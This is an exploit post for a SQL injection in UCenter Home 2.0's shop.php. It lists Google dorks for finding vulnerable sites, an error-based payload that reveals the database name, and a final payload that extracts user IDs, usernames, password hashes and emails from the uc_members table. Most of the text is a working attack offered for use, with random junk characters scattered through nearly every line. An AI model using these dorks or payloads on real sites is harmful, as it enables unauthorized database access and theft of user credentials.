8 a( z. S8 F/ ?4 @/ y/ G! f$ `# C__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ * k7 Z n0 Z% Q0 R7 L2 r' E& m . s) v+ {9 C8 Y1 j0 _ # t" g a7 T* K2 g; P* [& {
! x: u$ F1 M4 ?/ p! T3 i0 e% ~
*/ Author : KnocKout l- ~ D- S3 h @8 e+ ~2 s: c, s( E @3 x; M* F8 ?8 g' A$ }
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers $ J! b7 f0 N) u* ~
/ D9 x& x5 i2 n3 x
*/ Contact: knockoutr@msn.com ' d/ z, @3 |( m8 B7 U- d* k
( m; f8 l) Q* V5 B6 Z: ~*/ Cyber-Warrior.org/CWKnocKout / f2 f% i. z9 q9 v5 p- d
+ k! j+ _6 i0 @- V4 o
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( B& _ A6 t$ F% a
1 y5 z& _6 i) y, T6 Z3 w, J8 BScript : UCenter Home / ~' U5 z5 y$ K 1 h: j0 b/ B1 a h( r9 ?3 S sVersion : 2.0 ! B) }5 T( Y) E' s' U, x) W, _0 D; V5 `* W* ~0 N4 t6 N& W ^
Script HomePage : http://u.discuz.net/ # p8 j* y# {/ e+ ]1 M$ I
7 k+ G0 d" H* P5 N4 ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 \7 A4 B5 r! G. Q
0 ]6 h! Q$ x" C b9 lDork : Powered by UCenter inurl:shop.php?ac=view + u6 g. K" Q8 R; A: b' V4 r9 t
9 }5 [( r/ n$ } A; I/ qDork 2 : inurl:shop.php?ac=view&shopid= 5 c) J. r5 l4 ]5 _9 s, H
& R* r. B# [7 m" Y$ B8 A3 f3 o; Y8 V
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , b) k5 P+ D6 K% H* L % v, O+ K+ k+ r5 V, ]Vuln file : Shop.php : E% b1 a, S0 p' m9 l7 f& f7 w7 _. u& \
value's : (?)ac=view&shopid= ' b" A, v% o4 R1 k / E# b: N2 l, V; a8 TVulnerable Style : SQL Injection (MySQL Error Based) . j S2 F2 K$ p- N2 A' m, S* w* F2 E/ [- g$ U* u$ c: D
Need Metarials : Hex Conversion ' Z$ W# I, H9 w2 x1 O3 a1 ]' L# d( ~7 L! j J# I- @) Y0 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : F& u/ t" \1 a: T7 W6 E* F) V& {# C! }" w
Your Need victim Database name. 9 o% q0 P& a0 j/ P
' |/ _2 u7 \) W) z
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 2 @* U2 s% K O4 q+ O: z0 {4 ~ u/ Q
& ^* X8 Z. j. j1 B/ m" s.. 3 t) G9 {, U, M( Q . a2 N# ]+ N+ i# `1 d7 S% Q/ `6 oDB : Okey. 7 n+ i; {1 ^, |: \9 O% y
8 `2 u. q# `. Z n3 a
your edit DB `[TARGET DB NAME]` " I) ]6 W; d: K* [4 {& _ \' |0 k4 x! Q. y
Example : 'hiwir1_ucenter' 0 C4 k V0 @ q/ K n V
5 D/ \* X! n( I4 f8 F0 V; A
Edit : Okey. # G; a7 v, w6 N2 z K - u; x! j9 ^' g: h. hYour use Hex conversion. And edit Your SQL Injection Exploit.. 2 B I0 p t/ i7 F
: g/ U5 S _( z# B! I
; M) d5 B4 n( j0 g/ n( U4 y
8 t3 B) m8 q0 b# a* q; h( F& FExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 / N" H5 x1 w3 Z9 q7 K